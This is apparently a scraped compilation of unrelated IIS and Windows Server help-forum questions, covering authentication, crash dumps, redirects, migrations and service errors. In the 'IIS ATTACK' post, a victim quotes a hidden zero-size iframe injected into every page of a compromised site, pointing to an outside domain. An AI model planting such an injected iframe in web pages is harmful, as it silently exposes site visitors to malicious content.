Different authentication for intranet and extranet users?
I developed an authentication isapi filter. I would like to know is it
possible to use that filter just for users from the outside, and for
intranet users set the authentication type to something else (basic,
integrated or whatever)?
I hope this could be done with just one server.
Thanks in advance. Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404207
Help with DebugDiag Analysis
Can anyone tell me what this means? I have been struggling all day to
find the problem of our website continually hanging.
try point 0x0d8d4fe0
Create time 6/19/2008 2:16:40 PM
Time spent in user mode 0 Days 00:00:00.062
Time spent in kernel mode 0 Days 00:00:00.109
This thread is waiting on critical section 0x00085000 which has been
orphaned.
Function Source
ntdll!KiFastSystemCallRet
ntdll!NtWaitForSingleObject+c
ntdll!RtlpWaitOnCriticalSection+1a3
ntdll!RtlEnterCriticalSection+a8
ntdll!RtlpDphEnterCriticalSection+dc
ntdll!RtlpDphPreProcessing+10
ntdll!RtlpDebugPageHeapAllocate+cb
ntdll!RtlDebugAllocateHeap+2d
ntdll!RtlAllocateHeapSlowly+41
ntdll!RtlAllocateHeap+e9f
vfbasics+b900
rsaenh!ContAlloc+17
rsaenh!NTLMakeItem+c
rsaenh!CPCreateHash+104
advapi32!CryptCreateHash+93
admwprox!IISCryptoCreateHash+3d
admwprox!IISCryptoDecryptDataBlob+8a
admwprox!IIS_CRYPTO_STORAGE::DecryptData+1f
admwprox!IMSAdminBaseW_GetAllData_Proxy+8a
iisutil!MB::GetAll+34
w3core!W3_METADATA::ReadMetaData+140
w3core!W3_METADATA_CACHE::CreateNewMetaData+8f
w3core!W3_METADATA_CACHE::GetMetaData+166
w3core!W3_URL_INFO_CACHE::CreateNewUrlInfo+3f
w3core!W3_URL_INFO_CACHE::GetUrlInfo+26a
w3core!URL_CONTEXT::RetrieveUrlContext+ab
w3core!W3_STATE_URLINFO::DoWork+36
w3core!W3_MAIN_CONTEXT::DoWork+a6
w3core!W3_MAIN_CONTEXT::OnNewRequest+55
w3dt!UL_NATIVE_REQUEST::DoStateProcess+48
w3dt!UL_NATIVE_REQUEST::DoWork+7f
w3dt!OverlappedCompletionRoutine+1a
w3tp!THREAD_POOL_DATA::ThreadPoolThread+73
w3tp!THREAD_POOL_DATA::ThreadPoolThread+24
w3tp!THREAD_MANAGER::ThreadManagerThread+39
vfbasics+544f
kernel32!BaseThreadStart+34 Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404205
Scripting IIS redirect
Hi,
I have 4 Microsoft Windows Server 2003 Standard running IIS in a NBL
cluster. One common task is to create a virtual directory which
redirect to the correct url on the site. E.g. you enter www.mydomain.com/easy2remember
and you get redirected to www.mydomain.com/department/usersites/easy2remember.
Is there any way to script a this task, so I only have to enter the
name of the virtual directory and where it should redirect?
Best regards,
Rene Jensen Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404201
CRAXDRT error - Crystal Reports ASP Script
I am using Crystal RDC components with asp script to open report in browser
viewer crystal plugin. I have other sample reports that work fine. This
report has a few parameters prompted before running the report.
Configuration is Windows server 2003 with all recent updates applied.
Error I receive when running report is as follows:
CRAXDRT Error Occured on Server. -2147189176 : Logon Failed. Details:
Database Vendor Code: -329
Database is Informix with odbc System DSN setup on this webserver. Testing
connection through odbc panel works fine. Checked asp file and
authentication info is correct......
Any help would be appreciated.
Thanks,
Bob
--
BT Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404200
worker process threads
Hi, got an ASP.NET 2.0 application, that evry so often, causes the number of
threads used by a w3wp process to rapidly ncrease to over 150!!
I have configured the site with 3 worke process (web garden). Server is twin
Dual core 3GHZ with 4GB Ram running W2K3R2
When we find that that the threads have gone over 50-60, we also notice that
the users experience slowness. If i recycle the app pool service the site,
after about 2 mins it runs fine, until the next time.
Any ideas where to look.
Thanks Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404197
IIS admin console not working
Hi, I have a problem viewing my IIS admin console on my server, the shortcut
from the administrative tools is missing, and I cannot se it either on the
manage my computer snap-in. The IIS is installed on the server, I can see it
on the add/remove windows components, but I cannot open the IIS
administration console. Even the services are running!
I have installed OCS 2007 on this server, so I cannot just remove and
reinstall the IIS.
I even got to the iis.msc file on system32/inetsrv/ and tried to open it
from there but I only get and error that say MMC could not create the snap-in.
I can connect to the IIS through another server, but cannot assign or edit
certificates remotely, I need to do this on the server.
Please help, any advice is very much welcome.
I tried already copying the dll files from another server, but is the same
result.
thanks for the replies! Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404190
IIS ATTACK
hi
we are using windows 2k3 r2 .
user complient slow response i run netstat found that 222.189.239.223
accessing to all port. we block ip address from corporate firewall .now
netstat is not showing connection from 222.189.239.223.but whenever user try
access website they are redirected to http://haoyundao.3322.org we i righ
click web page click on event source it is showing <iframe
src=http://haoyundao.3322.org/ width=0 height=0></iframe>.
i check hd & found that this <iframe src=http://haoyundao.3322.org/ width=0
height=0></iframe> is put on all html & asp .
now how to change it
regards
pankaj Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404189
Problems with WebDAV publishing - odd redirects with virtual
I am experiencing an unexpected behavior with the Microsoft WebDAV
service and I was wondering if anyone has had a similar experience or
could suggest any fix.
I have a Windows 2003 SBS server whose netbios name is "server". I am
trying to enable WebDAV access to files on this server for users on
our VPN. (I'm trying to avoid passing CIFS traffic over the VPN.) I
set up a new web site in IIS on port 8000 and created virtual
directories in the root of this site to all the folders I want to
share on the server. I have also set access permissions so that the
site is only accessible from the LAN and VPN network segments.
I have successfully tested connecting to the server from the VPN using
Windows XP and "My Network Places", using the private IP address of
the server (i.e., setting the destination of the network place to
something like http://192.168.1.10:8000/ which routes correctly over
the VPN). I can list the directories in the root of the site and open
any real directories in the document root, but whenever I try to open
a virtual directory (for example, a virtual directory called "users"
that points to E:\Users\), I get an error message that "The folder
http://server/users is no longer available". Note that the address
listed in the error message shows the netbios name of the server,
which is different from the address I used to get to the server and is
not resolvable by DNS on the machine I am using, since it is connected
only via VPN. I tried adding an entry in the hosts file on the client
machine and this changed the error I get when I try to open the
folder: the address changes visibly in the address bar to http://server/users/,
and Explorer appears to try to list the contents of the directory but
ends up giving an error saying "Documents in this folder are not
available. The folder may have been moved or deleted, or network
problems may be preventing a connection to the server."
I also get an error if I try to open a file from a non-virtual
directory on the WebDAV server -- opening a text file, for example,
triggers an error in Notepad that "The filename, directory name, or
volume label syntax is incorrect". This error occurs regardless of
whether or not I have the hosts file entry in place.
I have tried connecting to the WebDAV server using Internet Explorer
instead of My Network Places, and I get a bare-bones directory listing
that does not include the virtual directories. However, if I manually
enter the address of one of the virtual directories (i.e., type
"http://192.168.1.10:8000/Users/" into the address bar), I am able to
see the contents of the directory and even open files.
Does anyone have any idea what's going on here?
Thanks,
Patrick Correia
patrick.correia@gmail.com Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404185
IIS Site Migration - application pool issues - Service Unavailable
Hi. I am moving a site from one Windows 2003 server to another, ASP.Net
2.0.50727, IIS 6.0, with a separate application pool, SQL 2005
Steps Taken:
- Created IIS Web application
- Created Application Pool
- Copied directory structure (web config connect string points to local
server)
- Restored database
- Created local user, network user
- Added network user to IIS_WPG
- Gave local user, IIS_WPG permission to web directory
- Updated IIS Web application with home directory, users, and application pool
- Browse: Error - Service Unavailable
I am getting a Service Unavailable, and the system event "A failure was
encountered while launching the process serving application pool 'NewSite'.
The application pool has been disabled."
I have tried using the iis 6.0 migration tool, as well as AccessEnum to view
permissions, but must be missing something.
Any help would be greatly appreciated. This has been very frustrating.
--
Pat Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404182
Allowing IIS (aspnet_wp or w3wp.exe) to access desktop
Hello all,
This is a modified version of a message I sent some time ago. David Wang was
kind enough to respond back then, I hope he or someone else will again this
time.
The problem I have now is that the solution I describe below does not seem
to work on XP anymore either. Has the security been tightened up on XP
(perhaps in SP3 or some update), so that I cannot make IIS "interact with
the desktop"?
In addition to the changes below I've also changed the userName for the
ASP.NET process to "SYSTEM", but that also seems to have no effect.
Original Message ----->
For debugging purposes I want to allow the w3wp.exe process to access the
desktop, and create windows on it. On XP I could use the Properties Dialog
("Log On" tab) and check the "Allow service to interact with desktop" box. I
would do this for the "World Wide Web Publishing Service" and the "IIS Admin
service". On Vista, this approach no longer works.
I've tried calling SetProcessWindowStation() from a DLL loaded into w3wp but
I cannot get that working either.
What's the Vista route to allow the IIS processes to access the desktop?
<--------- Original Message
Thanks,
john Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404181
IIS Dump File Help
Please tell me how can I send you the dump, because it's too large to post it
here.
Thanks you!!!! Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404177
Adding more memory to win2k3 server causing CPU spike on worker process(w3wp.exe
Hi, we tried to add 2GB of additional physical memory to the existing server
running windows 2003 std with IIS6 with 2GB, this memory change is causing
CPU spikes on w3wp.exe process to 100% almost all the time, is there any idea
why adding more memory to the server causing CPU spike on worker process(w3wp.
exe)
we had to rollback the memory to fix the spike. is there any changes i need
to make to use 4 GB of total memory on windows 2003 std 32bit server.
I tried adding /PAE /3GB switch in boot.ini, it doesnt help any suggestions
--
Message posted via http://www.winserverkb.com Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404176
Migrating IIS 6 Web and FTP accounts to a new server
Greetings Everyone,
i'm in the process of try to migrate my IIS Web and FTP settings from a
remote server to a new server here in the office. Is there a tool in place
that will migrate the setting as well as usernames/password from the remote
IIS to my local one as well as create new user account in Active Directory?
Please point me to any posts or references that may be of assistance in
this. If there is no way to do that though a tool, is there any way for an
admin to uncover the FTP passwords so that the accounts can be created
manually?
thanks, Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404172
IIS 7.0 unter Vista Ultimate installieren
Hallo NG,
Vista Ultimate auf Dell-Vostro Notebook.
So sollte es eigentlich gehen:
Systemsteuerung - Programme - Windows-Funktionen ein- oder ausschalten
Bis hierhin bin ich gelangt. Aber das Fenster "Windows-Funktionen" ist leer!
Keine Einträge, keine Checkboxen.
Dieses Problem scheint verbreitet zu sein: die Google-Suche bringt viele
ratlose Fragen diesbezüglich zutage, aber keine Antwort außer "mußt Du Vista
neu installieren".
Gibt's doch garnicht!
Wie kriegt man bei Vista die Checkboxen für das Nachinstallieren des IIS zu
sehen?
danke!
Liz Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404171
Unexpected authorization request when web site moved
Problem: trying to move web sites to a second controller in my domain, and I'm
getting unwanted request for authentication.
Detail: when the IP address of the site is on the domain controller, I
attempt to access it with IE. If I've set the site up in IIS, I see it, if
I
don't, I get a page not found. As expected. If I move the IP to the second
controller, and attempt to access it with IE, I get an immediate request for
user ID and password, whether or not the site is defined in IIS. As a side
note, any new sites I set up can be accessed without the user ID / password
request appearing.
Am I missing some permission somewhere? What do I need to do to resolve
this?
Thanks in advance,
Ben Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404170
Website migration from iis5 to iis7
Hi guys,
i need migrate my existent website on Windows 2000/IIS5 to Windows
2008/IIS7; exist any tool for migrate it without lost any webiste
configuration ? (website tree, virtual direcotry configuration , ip acl,
certificate etc...)
Thanks in advance. Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404168
Redirect IIS6
I am in the process of setting up an older web site. Right now, I have
pages like:
http://www.example.com/california/glendale/restaurants/mexican/index.sht
ml
http://www.example.com/california/glendale/stores/pets/index.shtml
http://www.example.com/california/glendale/services/auto_leasing/index.s
html
This goes on, one for each state, one for each city in each state, and
about 30 categories for each restaurant, store and service.
The shtml file opens up a framed document. These are all legacy files,
and I really want to get rid of them. In addition, since these files
are framed documents, well, we all know frames are evil.
Recently, we got hit with a nasty worm that put a javascript function
monkeys on all asp, html and shtml files. These shtml files and their
corresponding html files were all corrupted. Great! I said, get rid of
them once and for all.
My concern is 404s from search engines. Right now, there is a "Files"
site that goes to subdomain.example.com (the main site that has been
thoroughly optimized), and another site "www" that goes to
www.example.com. I had put on that site the requests should go to the
"Files" site in IIS, however, if I go to
www.example.com/newyork/newyork/restaurants/chinese/index.shtml it is
still going there and not to subdomain.example.com/files/index.asp.
So now that these legacy files are not going to be on the new server,
what is my best bet? Maybe a custom 404 that looks at the uri and
directs accordingly? I would prefer the server to send a 301 moved
permanently so that SEs will get a clue.
Maybe I can tell the www site to go to the files folder, and tell files
to go to www (without the legacy files). I would much prefer SEs to
list www.example.com instead of subdomain.example.com.
Any advice appreciated. TIA.
--
Adrienne Boswell at Home
Arbpen Web Site Design Services
http://www.cavalcade-of-coding.info
Please respond to the group so others can share Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404165
ASP pages not rendering
We have iis6.0 all of a sudden we are seeing that in some of the application
asp pages are not working.
Error "The specified request cannot be executed from current Application Pool"
there are no errors or warnings in the eventlog and have attached a debuger
to the app pool and there are no dump created.
not sure what to do next
Thanks,
Puru Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404164
SMTP service stops working
We are experiencing a issue that we can not find any information on.
Microsofts SMTP service periodically ceases to work. So any emails
being sent through our clients websites are going to the bad mail
folder when it stops working.
The only way we can find to resolve the issue is to reinstall the SMTP
service.
This is the error that we are receiving:
Unable to deliver this message because the follow error was
encountered: "Error is processing file in pickup directory.".
The specific error code was 0xC00402CE.
Any help would be greatly appreciated!
Thank you. Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404157
World Wide Web Publishing Service is not a valid Win32 application.
I've got a Windows 2003 SBS server recently upgraded to SP2.
This did work after the upgrade (so I'm told) but now the WWW service wont
start with the following error in the event list:
The World Wide Web Publishing Service service terminated with the following
error:
World Wide Web Publishing Service is not a valid Win32 application.
I've googled the hell out of this and I can't see anything that fits - any
ideas? Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404155
App fails-- The specified request cannot be executed from current
Applicaiton is failing with following error
"The specified request cannot be executed from current Application Pool"
there are no errors or warnings in the eventlog and have attached a debuger
to the app pool, there are dumps created.
Thanks,
Puru Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404154
Limiting log files
We have IIS 6 running on our Windows 2003 server and have IIS logging enabled
on some of our web sites. Is there a way to limit how long log files stay in
teh winnt\system32\logfiles directory? What I would like to do is save maybe
three months worth of log files and then have them over written. Is there a
way to set this up so that they are over written after a certain date? Plase
advise. Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404153
Hosting server.exe on IIS
Hi,
Can I make my server.exe as pluggable to IIS? Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404151
How to deploy one file (image) to IIS and set anonymous permissions ?
Hi,
I am searching for a simple solution to deploy an image to an IIS
(6/7) server.
The deployment should happen in a batch file or from a C# application
and the
permissions must be anonymous.
I have found a way to use System.DirectoryServices to enumerate the
permissions
of that file, if the IIS Admin has been used to setup the permissions.
But I am unaware
of doing that manually because I do not know, if I could setup these
entries by only
providing the permission part.
Any ideas ?
Thanks,
Lothar Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404150
File Not Found - IIS6
A need to install a website on IIS6. It's been working fine on IIS5.
When I try to access this one, I receive the following error message:
"Microsoft VBScript runtime error '800a0035'
File not found: 'CreateObject'
/LM/W3SVC/722531/Root/global.asa, line 24 "
Line 24 of my global.asa is:
Set oFSM = CreateObject("FSM18.CADSI")
The DLL for this object was correctly registered.
As I said before, it works correctly on IIS5.
Does anybody know if I need to configure something to make it works?
Thanks!!!
Felipe Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404143
Only allowing specific IPs to a web page through IIS?
Hello,
I'm playing around with Windows 2008 IIS. I know with my firewall I can
block and allow certain traffic in general. I was curious if I could
control in IIS for website A only traffic from IP 201.x.x.x can get to that
web site?
Thanks Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404130
IIS 6 - Windows Integrated authentication issues - HTTP Error 401.1
I installed a server running Windows Server 2003 with IIS 6.0, for testing.
Before I install Active Directory on this server, I configured a website on
IIS with Windows Integrated authentication. That was working properly, until
I install Active Directory.
Now, my website does not work with Windows Integrated Authentication, but it
works with Anonymous authentication.
This is the only domain controller for this domain. As I said before, this
server was installed just for testing.
Does anybody know why it's happening and what I need to do to resolve it?
Regards,
Felipe Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404129
IIS 7 IP binding
Hello,
I have problem with IP binding. I have Win 2k8 server with iis 7 and it has
2 IPs. One for special application and second for IIS. On iis a have 4 sites,
all of them are trough right click binded with just one IP, but when I start
World Wide Web Service it stats listen on all IPs and this means, that second
application cannost listen on second IP.
It is interesting because, only if i write into browser right IP a get
content of right site not from second IP. From secon IP a get error 404.
Why IIS is listening on all IPs? Is there some special site, which start and
listen on all IPs (i remove default site too).
Please help me, it is very importat for me.
Thank you Tomas Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404128
Scanner Vicitims
Here is a question for the experts;
Suppose IIS is being scanned by a web vulnerability scanner. This could
be from a static IP or a proxy chain of IPs. What is the best defence? I
know that many of them make a great deal of 'noise' after the event, but
what can you do at the time of it?
Many of them produce alot of 404 errors, is that they key? Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404121
subdomain to www redirection (url forwarding)
I wish to create a number of subdomains which then remap to the www address
to avoid problems (such as cross domain frame security amongst other
things)
eg xxx.xyz.com >> www.xyz.com (default.asp)
I think this can be done simply using the permanent redirection option.
my question is how to determine the original url ?
1) since its all in the same machine does it hang around as a server
variable
so that default.asp can see that it was originally xxx.xyz.com
2) or is there some HTTP header info that remembers the original url which
again can be inspected by default.asp Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404111
Changing an empty IISObject to an IIsWebDirectory
I have run into an issue when trying to create virtual folders with ADSI. For example, there is a physical folder:
/home/content/media/
Now, I want to create an "xml" virtual folder underneath the media folder. I have a script that runs through each of the specified folders. Most of them are already IisWebDirectory objects--which is required to create an IIsWebVirtualDir object.
However, sometimes the objects lack any typing information at all. As quoted from the ADSI page: "Each IIS ADSI object has the KeyType property, which specifies exactly what type of IIS admin object it represents. If the key type is not available or is not valid, IIS assigns the generic type IIsObject. You can use KeyType to change the ADSI object to a valid object and gain access to other IIS-specific properties and methods."
So I then attempt to grab the object generically and set its KeyType, but it doesn't work. Any suggestions about what I should do?
'Get the webdirectory, if possible.
on error resume next
set getParentObject = getParentObject.getObject("IIsWebDirectory", folders(folderCounter))
if err.number <> 0 then 'If we can't fetch it as an IIsWebDirectory, try to see if we can get it as a generic object and fix it.
alert "The """ & folders(folderCounter) & """ folder in the specified path (" & path & ") is not an IIsWebDirectory. Attempting to change it."
dim genericObject
set genericObject = ParentObject.getObject("IIsObject", folders(folderCounter))
if isObject(genericObject) then
genericObject.KeyType = "IIsWebDirectory"
genericObject.SetInfo
else
alert "It's not even an object"
end if
end if Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404101
Issue with idefault webpage
I am having issue which if i type in www.domain.com i get error message
If i type in the www.domain.com/index.htm , I am fine!
This is a second website on the server (2003R2 IIS6) Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404099
achg.asp page help
I am not sure if this is the correct news group for this question, so please
let me know I should post someplace else.
I am running IIS 6 on a Win 2k3 server for Outlook Web Access. We need to
modify the generic white page that displays the your password has expired
stuff so that it matches the theme of our other pages. I've done some
research and found that the achg.asp page looked like what we needed to
modify. However, I just dropped it into the iisadmpw folder and nothing has
changed - it's still the white generic page.
Can someone please help me find the correct file to modify so that this
works? This is the first webserver I have administered and I am not at all
sure of what I need to do. Someone else is actually doing the coding, all I
need to do is identify the file that needs to be changed and let him know.
Thank you! Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404098
IIS6 web services only allowing 3 connections
I have a .Net2 web service on a W2K3 Web server box that connects to a Oracle
DB on Solaris. At present it seems that it will only allow 3 connections to
the Solaris box. Loading the same web service onto a WinXP box, it works as
required allowing many connections.
--
Thanks
Chris Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404097
IIS 6 on Win2k3 64 bit
I have a windows 2003 server 64 bit running IIS 6.0. Is that such thing you
can make it run in 64 bit mode? How do I know if it's running as 32 bit mode
or 64 bit mode now? How to switch between the mode?
Thanks. Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404095
Rename IIS server - IUSR and IWAM user names do not change
Hello,
I have renamed an IIS 6 server (W2K3, SP2). The IUSR and IWAM account names
did not change. Should I manually rename them? Or if I leave them as they
are will they work correctly (I assume the account SID is being used, so the
'name' may not matter).
What is the best path to take when IUSR and IWAM are not renamed after a
server is renamed? Thank you,
JT Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404090
Moving default web
We are running IIS6 on win 2003 server. It was setup with the "Default Web
Site" pointing to C:\Inetpub\wwwroot. I want to move it to
D:\Inetpub\wwwroot. Can I simply point the default to the new drive/folder
and then copy the webs to that drive, or is there something more that is
needed. Thanks.
David Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404089
automatic restart of IIS 5 if using too much RAM
I have a Win2K server running IIS5 with a website we use for one of our
departments. Whenever the dllhost or aspnet_wp process get above a certain
amount of RAM used, the app becomes unusable. Is there any way to set it to
automatically restart if either get above a certain amount of memory used, or
a script out there that will check it every so often and do this? Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404074
How to configure IIS to allow server side includes
Hi
I'm using Windows XP SP2, IIS and FP Extensions.
I want to be use server side includes in the web pages on my local webs
(http://localhost), without having to use .shtml or similar extensions. I
have read that it is possible to configure my local web to allow ordinary
extensions such as .htm to be used, but I haven't been able to find any
information about how to do this. Please can someone help?
Dave Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404072
Using an Alias name to access a web site.
I have a server with a long name and instead of having users type such a
long name to access this intranet resource I want to use an alias that's
shorter (e.g. http://web). How do I set this up?
thanks....
Enrique Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404071
multiple certs for same site
Is it possible / recommended to have more than 1 cert for a IIS site?
Each cert would be for a different virtual directory. Basically 1 for
webmail and 1 for OMA
Thanks
CR Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404066
IIS integrated windows authentication and NetBIOS comp. name, IP address, FQ Domain Name
Hello,
how to force IIS (integrated windows auth.) does not prompt the users
for a username and password when access the web application
using IP address and fully qualified domain name ?
thanks
miso Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404065
Migrating FTP Site from IIS 5 to IIS 6
I have a couple of questions...
First, should this work at all? I can find no references anywhere to using
the tool to migrate and FTP server.
Second, I have tried to run the tool using the following commands:
iismt.exe SERVERNAME "Default FTP Site" /configonly
or
iismt.exe SERVERNAME MSFTPSVC1 /configonly
and both failed with this message:
The IIS Migration Tool was unable to open the metabase key /LM/W3SVC/Info.
The system cannot find the path specified.
Any help would be most appreciated.
I am trying to move a server with 1 FTP site, but over 300 virtual
directories from W2K to W2K3.
Thank you. Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404064
CDO, ASP and Email Form Problems
I have successful setup email forms on our web site using CDO and ASP
scripting,
using this coding http://www.ilopia.com/Articles/WindowsServer2003/CDO.aspx
It is used on this page
http://www.chaucer.sheffield.sch.uk/about/contact.asp
The form works, but when the mail arrives it in the inbox, the senders name
is not displayed, as it is not included in the form.
Only "From (Email Address)" and "Message" are included.
How do I add a name field, and maybe extra field to be included in the
message.
Thank you for any help. Tag: How to see HTTP Error Logs of IIS 7.0 in Windows Server 2008/Vista Tag: 404058
Hi,
Can anyone tell me where is the centarlized logging done by IIS 7.0
for all HTTP Errors.